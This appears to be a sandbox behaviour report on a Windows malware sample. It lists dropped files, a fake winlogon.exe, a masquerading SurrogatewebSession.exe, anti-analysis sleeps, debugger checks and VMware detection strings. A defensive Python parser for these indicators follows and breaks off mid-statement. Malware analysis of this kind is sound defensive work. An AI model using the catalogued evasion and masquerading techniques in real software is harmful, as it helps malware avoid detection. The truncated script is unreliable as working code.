Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Memory allocated: 1AB50000 memory reserve | memory write watch
Source: C:\Recovery\winlogon.exe Memory allocated: FE0000 memory reserve | memory write watch
Source: C:\Recovery\winlogon.exe Memory allocated: 1AFB0000 memory reserve | memory write watch
Source: C:\Recovery\winlogon.exe Memory allocated: E50000 memory reserve | memory write watch
Source: C:\Recovery\winlogon.exe Memory allocated: 1A910000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Memory allocated: EB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Memory allocated: 1A8C0000 memory reserve | memory write watch
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Memory allocated: 1480000 memory reserve | memory write watch
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Memory allocated: 1B0E0000 memory reserve | memory write watch
Source: C:\Recovery\winlogon.exe Memory allocated: 21E0000 memory reserve | memory write watch
Source: C:\Recovery\winlogon.exe Memory allocated: 1A3C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 599891 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 599781 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 599671 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 599563 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 599452 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 599331 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 597297 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 597175 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\winlogon.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\winlogon.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\winlogon.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Window / User API: threadDelayed 3628 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Window / User API: threadDelayed 2325 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Dropped PE file which has not been started: C:\Users\user\Desktop\tnEMlbYs.log Jump to dropped file
Source: C:\Recovery\winlogon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\aEtIhTbg.log Jump to dropped file
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Dropped PE file which has not been started: C:\Users\user\Desktop\vybNluDs.log Jump to dropped file
Source: C:\Recovery\winlogon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\WslZMRrk.log Jump to dropped file
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Dropped PE file which has not been started: C:\Users\user\Desktop\MFrsFgjH.log Jump to dropped file
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Dropped PE file which has not been started: C:\Users\user\Desktop\lKwWBiIK.log Jump to dropped file
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Dropped PE file which has not been started: C:\Users\user\Desktop\TDfrhvdw.log Jump to dropped file
Source: C:\Recovery\winlogon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\LdxTVLQK.log Jump to dropped file
Source: C:\Recovery\winlogon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\tRVOBpwv.log Jump to dropped file
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Dropped PE file which has not been started: C:\Users\user\Desktop\RAtJMMZA.log Jump to dropped file
Source: C:\Recovery\winlogon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\rGzNBWQu.log Jump to dropped file
Source: C:\Recovery\winlogon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\BudDliLc.log Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Evasive API call chain: GetLocalTime,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -14757395258967632s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -599891s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -599781s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -599671s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -599563s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -599452s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -599331s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -99859s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -99750s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -99640s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -99531s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -99422s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -99312s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -99203s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -99094s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -98984s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -98875s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -98765s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -98656s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -98547s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -98437s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -98328s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -98219s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -98109s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -597297s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 Thread sleep time: -597175s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7188 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7804 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe TID: 7976 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe TID: 8012 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7564 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 2004 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\winlogon.exe TID: 7660 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\winlogon.exe TID: 7640 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7988 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe TID: 1732 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\winlogon.exe TID: 8052 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\winlogon.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\winlogon.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\winlogon.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A2BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_00A2BA94
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A3D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_00A3D420
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_0031BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 3_2_0031BA94
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_0032D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 3_2_0032D420
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0072A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 4_2_0072A69B
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0073C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 4_2_0073C220
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A3F82F VirtualQuery,GetSystemInfo, 0_2_00A3F82F
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 599891 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 599781 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 599671 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 599563 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 599452 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 599331 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 99859 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 99750 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 99640 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 99531 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 99422 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 99312 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 99203 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 99094 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 98984 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 98875 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 98765 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 98656 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 98547 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 98437 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 98328 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 98219 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 98109 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 597297 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 597175 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\winlogon.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\winlogon.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\winlogon.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: work.exe, 00000003.00000003.1630533570.0000000002D5C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y.,
Source: dwartg.exe, 00000004.00000003.1628390760.0000000002E82000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: dwartg.exe, 00000004.00000003.1628390760.0000000002E82000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: winlogon.exe, 0000002B.00000002.1920928319.0000000012489000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 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
Source: SurrogatewebSession.exe, 00000008.00000002.1740551544.000000001C098000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: winlogon.exe, 0000002B.00000002.1920928319.0000000012522000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 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","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: work.exe, 00000003.00000003.1630533570.0000000002D5C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: work.exe, 00000003.00000002.1631802705.0000000002CCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#4&224f42ef&0&0@
Source: wscript.exe, 00000005.00000002.1664665110.0000000002D6B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef
Source: SurrogatewebSession.exe, 00000008.00000002.1740585685.000000001C0B9000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000027.00000002.1785246422.000001FA32E09000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A40A0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00A40A0A
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A491B0 mov eax, dword ptr fs:[00000030h] 0_2_00A491B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_003391B0 mov eax, dword ptr fs:[00000030h] 3_2_003391B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_00747DEE mov eax, dword ptr fs:[00000030h] 4_2_00747DEE
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A4D1F0 GetProcessHeap, 0_2_00A4D1F0
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process token adjusted: Debug Jump to behavior
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process token adjusted: Debug
Source: C:\Recovery\winlogon.exe Process token adjusted: Debug
Source: C:\Recovery\winlogon.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A40A0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00A40A0A
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A40B9D SetUnhandledExceptionFilter, 0_2_00A40B9D
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A40D8A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00A40D8A
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A44FEF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00A44FEF
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_00330A0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00330A0A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_00330B9D SetUnhandledExceptionFilter, 3_2_00330B9D
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_00330D8A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00330D8A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_00334FEF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00334FEF
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0073F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_0073F838
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0073F9D5 SetUnhandledExceptionFilter, 4_2_0073F9D5
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0073FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_0073FBCA
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_00748EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00748EBD
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Memory allocated: page read and write | page guard Jump to behavior
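The sleep, write-watch and VM-string entries above are the ones an analyst wants to pull out in bulk across many reports. The following is an added example (mine, not part of this report or of the sandbox's tooling) that parses lines in exactly this format and tags each process with the evasion indicators it tripped: the .NET sleep-forever sentinel of 922337203685477 ms (TimeSpan.MaxValue in milliseconds), sleeps above the 30 s threshold the report itself applies, write-watch reservations, VM device strings in memory, and a Windows system binary name such as winlogon.exe running from outside the system directories. The sample input is constructed from lines in this section; the indicator names, the system-name watchlist and the VM marker list are assumptions of the example, and "Hyper-V RAW" is deliberately treated as weak because that Winsock provider string exists on non-virtualised Windows too.

```python
"""Flag sandbox-evasion indicators in Joe Sandbox style behaviour lines.

Added example for this report (not sandbox tooling). SAMPLE_LINES is
constructed from entries in this section; indicator names, the watchlist of
system binary names and the VM marker list are my own choices.
"""
import re
from collections import defaultdict

# .NET Thread.Sleep(TimeSpan.MaxValue) shows up as this many milliseconds
# (long.MaxValue ticks / 10_000): effectively "sleep until the sandbox gives up".
INFINITE_SLEEP_MS = 922_337_203_685_477
LONG_SLEEP_MS = 30_000          # the threshold the report itself applies
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SYSTEM_NAMES = {"winlogon.exe", "csrss.exe", "lsass.exe", "svchost.exe", "smss.exe"}
# "hyper-v" is weak: the "Hyper-V RAW" Winsock provider string is present on
# every current Windows build, virtualised or not.
VM_MARKERS = ("vmware", "vbox", "virtualbox", "qemu", "hyper-v")

MEMSTR_RE = re.compile(r"^Source: (?P<srcs>.+?) Binary or memory string: (?P<s>.*)$")
PROC_RE = re.compile(r"^Source: (?P<proc>.+?\.exe) ")
SLEEP_RE = re.compile(
    r"^Source: (?P<proc>.+?) (?:TID: \d+ Thread sleep time: -|Thread delayed: delay time: )(?P<ms>\d+)")
WATCH_RE = re.compile(
    r"^Source: (?P<proc>.+?) Memory allocated: (?P<addr>[0-9A-Fa-f]+) memory reserve \| memory write watch")


def classify(lines):
    """Map each process (full path, or bare name for memory-dump lines) to the
    evasion indicators observed for it; values are sorted and de-duplicated."""
    hits = defaultdict(lambda: defaultdict(set))
    for raw in lines:
        line = raw.strip()
        m = MEMSTR_RE.match(line)
        if m:
            text = m.group("s").lower()
            marker = next((k for k in VM_MARKERS if k in text), None)
            if marker:
                # One memory-string line may name several processes.
                for proc in re.findall(r"(\S+\.exe), ", m.group("srcs")):
                    hits[proc]["vm_artifact_string"].add(marker)
            continue
        m = PROC_RE.match(line)
        if m:
            path = m.group("proc")
            if (path.rsplit("\\", 1)[-1].lower() in SYSTEM_NAMES
                    and not path.lower().startswith(SYSTEM_DIRS)):
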